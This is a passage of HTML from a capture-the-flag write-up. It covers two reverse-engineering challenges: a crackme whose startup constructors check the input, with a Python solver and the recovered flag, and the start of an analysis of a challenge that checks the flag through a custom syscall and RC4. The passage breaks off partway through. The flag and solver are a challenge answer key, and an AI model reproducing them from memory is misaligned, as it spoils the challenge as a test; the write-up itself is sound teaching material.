QXJH8AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9394035879318735fa9c024967b03c24/8ac56/image-20240615161025077.webp 240w,\n/static/9394035879318735fa9c024967b03c24/57bab/image-20240615161025077.webp 449w\"\n              sizes=\"(max-width: 449px) 100vw, 449px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9394035879318735fa9c024967b03c24/8ff5a/image-20240615161025077.png 240w,\n/static/9394035879318735fa9c024967b03c24/053a9/image-20240615161025077.png 449w\"\n            sizes=\"(max-width: 449px) 100vw, 449px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9394035879318735fa9c024967b03c24/053a9/image-20240615161025077.png\"\n            alt=\"image-20240615161025077\"\n            title=\"image-20240615161025077\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This is where an array of function pointers used for initialization at program startup is stored; these are executed before the main function.</p>\n<p>Therefore, I’ll examine the functions chained here from top to bottom.</p>\n<h3 id=\"check-for-command-line-arguments\" style=\"position:relative;\"><a href=\"#check-for-command-line-arguments\" aria-label=\"check for command line arguments permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Check for Command-Line Arguments</h3>\n<p>The first function appears to verify whether command-line arguments are present.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/73ab23e74d67f17676b58de084f42253/c6671/image-20240615161121587.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABVklEQVQoz22RW1ODQAyF+TfQcl1A7cUHoa21BYQulwWqbR0dn/z/r8fsKrUz9uGbk2RDkjlo4/EYA6PRSKlpmueais2/mtQhHvov0S4fdF3HZDZB23foD3v0pz1E36LtWgiio3rTNBCtQBAGMHTj+sABwzBwN52gqmscPo44fb1DvNAwIWhYj4aUlyU45/CDQPX/GyivG5ANwW2I1foRm2yLhKd4yjZYrpaIFrHiIY4QxTFcz1X9l99LNNu2YVkWPJ+pJseVOJB1m+qSG4/Bd1wwInQ9uPRmkq8WeWn9ejqolhc5dhVH1dWQcU1xkmyxXiywo7xpa1SiQr17RssLiLJGmReUc6VVwdHwEhXl97M5NJcu8pinkBf6jKnrllGEsi7x+nmEeOvJtxw9DRddpzzMsowWJ0jTVCHz+XQKTfpwDUaLAt8/47MfQopD+iFy8SUB4dAh3+CQDPaKGLUAAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/73ab23e74d67f17676b58de084f42253/8ac56/image-20240615161121587.webp 240w,\n/static/73ab23e74d67f17676b58de084f42253/d3be9/image-20240615161121587.webp 480w,\n/static/73ab23e74d67f17676b58de084f42253/e46b2/image-20240615161121587.webp 960w,\n/static/73ab23e74d67f17676b58de084f42253/ea1d1/image-20240615161121587.webp 1129w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/73ab23e74d67f17676b58de084f42253/8ff5a/image-20240615161121587.png 240w,\n/static/73ab23e74d67f17676b58de084f42253/e85cb/image-20240615161121587.png 480w,\n/static/73ab23e74d67f17676b58de084f42253/d9199/image-20240615161121587.png 960w,\n/static/73ab23e74d67f17676b58de084f42253/c6671/image-20240615161121587.png 1129w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/73ab23e74d67f17676b58de084f42253/d9199/image-20240615161121587.png\"\n            alt=\"image-20240615161121587\"\n            title=\"image-20240615161121587\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"validate-input-length-of-0x20-characters\" style=\"position:relative;\"><a href=\"#validate-input-length-of-0x20-characters\" aria-label=\"validate input length of 0x20 characters permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Validate Input Length of 0x20 Characters</h3>\n<p>The next function checks whether the length of the received command-line argument is 0x20 characters.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 718px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6191c69fac5d5b621a661be85f3824f5/57dc1/image-20240615161131582.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABTUlEQVQoz22QW2+CQBCF/TOVS7hLraVRC4hoFJalIAiatjF98v8/n86ukrZJHz5mZlnOHM5IURTMnmfgbxy8LlEQjBcoCMYZWMGov8GK/A77Q8Yy2I4NVVUxEoLBS4C2bXG5fuH9ekF3OuLz44y+79Cde5xoPja1pG8rWbumQtM2ODQHVHUFx3VugqqiYvo0RbrdYFdk2PE9kk2KJF0TiWS9TRGtYoQDcSzngTiJYZFDTQhqmgZd12FaFizThGmY8CYevMcJXM+V+P4EE3Lg2bbEd12Y4q5pyG8Mw4Cmk46m3wWpieLollfFkZdUKReWZ8jpLA5D5Pu9/L3m1KCmvA8ic16iZAzzIICIThj7cUibbNousGzrV2/DdRws5nNEUYh4HeF1uUC0XNKiCCvC9zyZnxQUDyEqEIf/Id+RA2U8hvIwlm6UYaY6iIl732Ti79heQqZkAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6191c69fac5d5b621a661be85f3824f5/8ac56/image-20240615161131582.webp 240w,\n/static/6191c69fac5d5b621a661be85f3824f5/d3be9/image-20240615161131582.webp 480w,\n/static/6191c69fac5d5b621a661be85f3824f5/7d0c9/image-20240615161131582.webp 718w\"\n              sizes=\"(max-width: 718px) 100vw, 718px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6191c69fac5d5b621a661be85f3824f5/8ff5a/image-20240615161131582.png 240w,\n/static/6191c69fac5d5b621a661be85f3824f5/e85cb/image-20240615161131582.png 480w,\n/static/6191c69fac5d5b621a661be85f3824f5/57dc1/image-20240615161131582.png 718w\"\n            sizes=\"(max-width: 718px) 100vw, 718px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6191c69fac5d5b621a661be85f3824f5/57dc1/image-20240615161131582.png\"\n            alt=\"image-20240615161131582\"\n            title=\"image-20240615161131582\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"validate-input-two-characters-at-a-time\" style=\"position:relative;\"><a href=\"#validate-input-two-characters-at-a-time\" aria-label=\"validate input two characters at a time permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Validate Input Two Characters at a Time</h3>\n<p>The subsequent functions extract 2 characters from a hardcoded byte sequence and verify that they match 2 characters of the input string.</p>\n<p>I extracted the values being verified from the binary and created the following solver.</p>\n<p>Running this solver identified the correct flag as <code class=\"language-text\">ctf4b{c0ns7ruc70rs_3as3_h1d1ng_7h1ngs!}</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">flag <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span>\nf <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"c0_d4yk261hbosje893w5igzfrvaumqlptx7n\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"oxnske1cgaiylz0mwfv7p9r32h6qj8bt4d_u5\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"lzau7rvb9qh5_1ops6jg3ykf8x0emtcind24w\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"9_xva4uchnkyi6wb2ld507p8g3stfej1rzqmo\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"r8x9wn65701zvbdfp4ioqc2hy_juegkmatls3\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"tufij3cykhrsl841qo6_0dwg529zanmbpvxe7\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"b0i21csjhqug_3erat9f6mx854pyol7zkvdwn\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"17zv5h6wjgbqerastioc294n0lxu38fdk_ypm\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"1cgovr4tzpnj29ay3_8wk7li6uqfmhe50bdsx\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"3icj_go9qd0svxubefh14ktywpzma2l7nr685\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"c7l9532k0avfxso4uzipd18egbnyw6rm_tqjh\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"l8s0xb4i1frkv6a92j5eycng3mwpzduqth_7o\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"l539rbmoifye0u6dj1pw8nqt_74sz2gkvaxch\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"aj_d29wcrqiok53b7tyn0p6zvfh1lxgum48es\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"3mq16t9yfs842cbvlw5j7k0prohengduzx_ai\"</span><span class=\"token punctuation\">)</span>\nf<span class=\"token punctuation\">.</span>append<span class=\"token punctuation\">(</span><span class=\"token string\">\"_k6nj8hyxvzcgr1bu2petf5qwl09ids!om347a\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    flag <span class=\"token operator\">+=</span> f<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token operator\">*</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">+</span> f<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token operator\">*</span>i<span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># c0ns7ruc70rs_3as3_h1d1ng_7h1ngs!</span></code></pre></div>\n<h2 id=\"former-seccomprev\" style=\"position:relative;\"><a href=\"#former-seccomprev\" aria-label=\"former seccomprev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>former-seccomp(Rev)</h2>\n<blockquote>\n<p>I tried creating a custom system call for flag checking.</p>\n</blockquote>\n<p>Analyzing the challenge binary, I found that it first calls fork, with the child process creating a copy of itself as a child process.</p>\n<p>On the child process side, the check function shown below is called, and it appears to verify the flag by executing system call 0xcafe with the received flag string as an argument.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 629px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3eb971a0821c2c0558f0206edf806ba5/63a68/image-20240615171603286.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 117.08333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAXCAYAAAALHW+jAAAACXBIWXMAAAsTAAALEwEAmpwYAAACuklEQVQ4y5VVWXbaQBDkNEbrLJqRxGZiHIOA4Czv5SUnyP2PUKluAQYZ288fhaSRpqe7qroZ7XdbHJ4P2H7/hW63x+HbHj9/HLDbdliv19fYrF+vDTAqjUFRFCjLEsZavWZZhlSQZi/3+pzq8wl5nr/CSF5IoLqu0U5aNG2jQUPl0AYL5z2Ct4rY1LD81gWne9Ik1UMuoQE9P27qgEl0WMwazKYNlosWj1+mqGJA3QQ0RJTDWFFpWRUPHWYsGJ1SdSZHjBUz8LxnNlWEcx5ZXiBJEiJFMk6ussmONFwG1oBZxmDMcrlcsGxmVQUYBpX19GKTIknPpd4MmDGgNSUzM3CEdz2cKVBZClUWKPjeEMKtJbeCgus3Sz4FDBV5pAh18ArJWESxwhkPsAoLw3XDg/OieJtDKa32BvNpDU/urHUsNcc4Sa7KFC5TxQccFoRhOWKdGCM59OrN4elD3C6ZP4HZNfRWXTdoibyguTWz5Oam99D70Em5Dab3CzWvIVfitdJXGry3TY/0eFByhYGxpSsWswkeHpeYz1qW7WjkiDidUAiqSgsFWilUFakx2iUikHaNd+qQksKKwMqhqCycibkrR8WZceCHnlxKZ/QBKw0q9+dArm/NU0BR/qzyJNLY9zP28hQxRFonIhBq7nRQ8lD5YS8LSkYXhUMINLjVl3d3dy9tN+AtHQQ6B1ytVug2T+i6NbbrFX4/7/Hv7x/InNzud9hwfbd5xH7fcV5u0W03nHtP+EqsHlaQ/ZcYCR+exEt3zCY1Hu6XFGjGweBeeNKWdP3aUQwRxpDfIUaSpvSrs+Vx0BrlTbpkPB6/KvUjnG0jUC7LfggIp3JiL9onjK3zUKZ2maFi49exwaRpVWW5im0+0y2aYeSkmc+nCOzl838KgyTvDNK3M2Rpwp2KQ5MK8ZL15ebPZPgfW4zIbg4tyNkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3eb971a0821c2c0558f0206edf806ba5/8ac56/image-20240615171603286.webp 240w,\n/static/3eb971a0821c2c0558f0206edf806ba5/d3be9/image-20240615171603286.webp 480w,\n/static/3eb971a0821c2c0558f0206edf806ba5/abae2/image-20240615171603286.webp 629w\"\n              sizes=\"(max-width: 629px) 100vw, 629px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3eb971a0821c2c0558f0206edf806ba5/8ff5a/image-20240615171603286.png 240w,\n/static/3eb971a0821c2c0558f0206edf806ba5/e85cb/image-20240615171603286.png 480w,\n/static/3eb971a0821c2c0558f0206edf806ba5/63a68/image-20240615171603286.png 629w\"\n            sizes=\"(max-width: 629px) 100vw, 629px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3eb971a0821c2c0558f0206edf806ba5/63a68/image-20240615171603286.png\"\n            alt=\"image-20240615171603286\"\n            title=\"image-20240615171603286\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>On the parent process side, some function is called with the child process’s PID as an argument.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 444px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d4dd2736a58258f75906e4d417a3011d/9b7bd/image-20240615171546469.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 82.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB/klEQVQ4y5VTyW7bMBDVt9jWSlEbqbV1k8C25B5yyK2XAvEiL01RoP9/eJ2h7MDoxdbhaTiP5NNstPr9Fr8/DmC7OZzxTjieenyce+yJ608H7Po9jv0Ov850ru8Nt91tcToyd8SeuMPpiM1uD6ttV/i+bsF22a4Nuq7FmrnVCu26Q0t+R/tdR2eWS3TMtXSGfOav3Io4yxcStm3DdR04V+tc1mTtmT2A1/awx+edi8/8LWeJMESaRFjMCxR5hvpLDZVrzBuNl+cGWVUjiiMEQfAQrCAQRlCpFKqqkKSpgW4KpIVCTjYrcvg+XfD9+4JCCEQyRCgCgygUkOTHUYIkThCIEL7nDRdI1L8jaoWUMotypM+NGlKvK6hMQyuNUA7p+g9E959ggCpXqKuSBGuUZUmloPTjeJzgNWUZDlFGUWREVKYQk+UfjhIMxNAUrTNqQg4ZSUjyJTXGdV0jdBXzH21KzCIUYaVzPJU1vlWNSVdcogsejO6mhiE8uvTj9Q1/f27w573HYrGCpnpKKoE/RpDFTP18DyqN0VQaRZEhThN4l3EZKciNkEh0AZEouDRr/Iw81/us3zhB+vCslfMXlF+fUNJrKfIccZJQ5KGJ8lb4Hqw4zehlSDMqGYnkWqPiGSSeR4gz4Do/CstxXMxmM4MpYzrFZDIxljlOfwz+AdOdFpEFktmHAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d4dd2736a58258f75906e4d417a3011d/8ac56/image-20240615171546469.webp 240w,\n/static/d4dd2736a58258f75906e4d417a3011d/ced2a/image-20240615171546469.webp 444w\"\n              sizes=\"(max-width: 444px) 100vw, 444px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d4dd2736a58258f75906e4d417a3011d/8ff5a/image-20240615171546469.png 240w,\n/static/d4dd2736a58258f75906e4d417a3011d/9b7bd/image-20240615171546469.png 444w\"\n            sizes=\"(max-width: 444px) 100vw, 444px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d4dd2736a58258f75906e4d417a3011d/9b7bd/image-20240615171546469.png\"\n            alt=\"image-20240615171546469\"\n            title=\"image-20240615171546469\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This function is defined to call the following code when system call 0xcafe is triggered.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 743px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2e65ee39d336559d28a25f7aa1df66c/f2793/image-20240615171618621.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVQoz41R2U7DMBD059jx7dh1SpK2CFIhkCgggYTE///GsGuqcLzQh/H6nJ0ZC+8cQorwIcAFD0tQSq3ouo5qt87/g+AhRY9aEkpybe68h0+hVSW/iS4hFVprlJyxKRm1FsQYYK1tMNaAzy9RthIaY0gVqwnwMcJRBJEisETGZ0zMlqWUTaFkSLWu2cHPiIQ+W4lElpNHqZWUWeqm4Kymfd9iKJmbWXhnEL35yttoWBLAza3jNxoi0Gew3XEouNpW1GGgusVIxNOmYCDknOhOj0TKe0Luqea+iUh9ao7i+WPFfrfDcrzFkbAsN7hbrvF2esLH8yveH19wun/A/nDAOE6Ypr+Yf63necYn7D7bISv9VqYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2e65ee39d336559d28a25f7aa1df66c/8ac56/image-20240615171618621.webp 240w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/d3be9/image-20240615171618621.webp 480w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/53666/image-20240615171618621.webp 743w\"\n              sizes=\"(max-width: 743px) 100vw, 743px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2e65ee39d336559d28a25f7aa1df66c/8ff5a/image-20240615171618621.png 240w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/e85cb/image-20240615171618621.png 480w,\n/static/b2e65ee39d336559d28a25f7aa1df66c/f2793/image-20240615171618621.png 743w\"\n            sizes=\"(max-width: 743px) 100vw, 743px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2e65ee39d336559d28a25f7aa1df66c/f2793/image-20240615171618621.png\"\n            alt=\"image-20240615171618621\"\n            title=\"image-20240615171618621\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The callback function called within this system call appears to generate a key from a hardcoded seed, then decrypt a hardcoded ciphertext using a decryption function and verify whether the result matches the input.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 761px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3f5067115416a2885d9e251d67c555f4/8c857/image-20240615171527179.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 101.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACAUlEQVQ4y51UWbLbMAzzbV5sa1+8pOmbrPXr/Q+EgnLsSZq2E/cDIw8lQyBBqrper7hcLrhMP1dMXxN+TDdcbzecTqdNqOqmgdYaRitYa9A0Neq6xm63w+7jY143oFJKwXuHLgUMQ4ZzFtZbaGMKccMLt6BSbUuFVEciRaUSFKKFbCspFbZI0aFt2jnYvh7aQlq1VCjo+4wQA1zws0LWo+BB6TvEK6Fn3Zz3NMYiOg0fI2xKMM69rVDOlRoKoazicgwOhmUQUxTR0rRF3b+wKlyYVasQqTJFT3NmMkXFhZSXGV5WzDPsCqvKt6jXIUJLFkvbhBCYrkdiesPQs5Ydctch9T3SMCDmDpF7mfHAMiTWObPFIteUM2I37wuHI3F1OBwguN2uOJ5POE9f+DydC74Ljkd8nrmeL/jGc+O4x7jfY0+M44j9gnusqus595xnhy0VS4qN1OWPdaqfUPYeTVlc1iy+o8MpWORgS29mGuR5ieMkCaQsXbTFuC55eA6D7AsM/5WpWwnFZWN0GT0h9c4geMOYKWRlj4iMlz1COkHqZu5j+qRQ2EV24G25S5yY9q12eWmbhbC9z7S0TZ99eYHKbG9o6idC6UNJq6c6SWmJ/42wFkOaev1+UigfMiXyfKnfJmPLHK+E8rhqqrNGv74uW58vmVVxTNwV1/7nDXzELwXKZkjd7lt3AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3f5067115416a2885d9e251d67c555f4/8ac56/image-20240615171527179.webp 240w,\n/static/3f5067115416a2885d9e251d67c555f4/d3be9/image-20240615171527179.webp 480w,\n/static/3f5067115416a2885d9e251d67c555f4/6e34c/image-20240615171527179.webp 761w\"\n              sizes=\"(max-width: 761px) 100vw, 761px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3f5067115416a2885d9e251d67c555f4/8ff5a/image-20240615171527179.png 240w,\n/static/3f5067115416a2885d9e251d67c555f4/e85cb/image-20240615171527179.png 480w,\n/static/3f5067115416a2885d9e251d67c555f4/8c857/image-20240615171527179.png 761w\"\n            sizes=\"(max-width: 761px) 100vw, 761px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/3f5067115416a2885d9e251d67c555f4/8c857/image-20240615171527179.png\"\n            alt=\"image-20240615171527179\"\n            title=\"image-20240615171527179\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the decryption function implementation, it was clearly RC4, so I renamed it to rc4.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 900px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3c44ed3c0ca02456a7f58b45e3025f9b/1cfc2/image-20240615171633672.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 82.91666666666667%; position: relative; bottom: 0; left: 0; background-image: 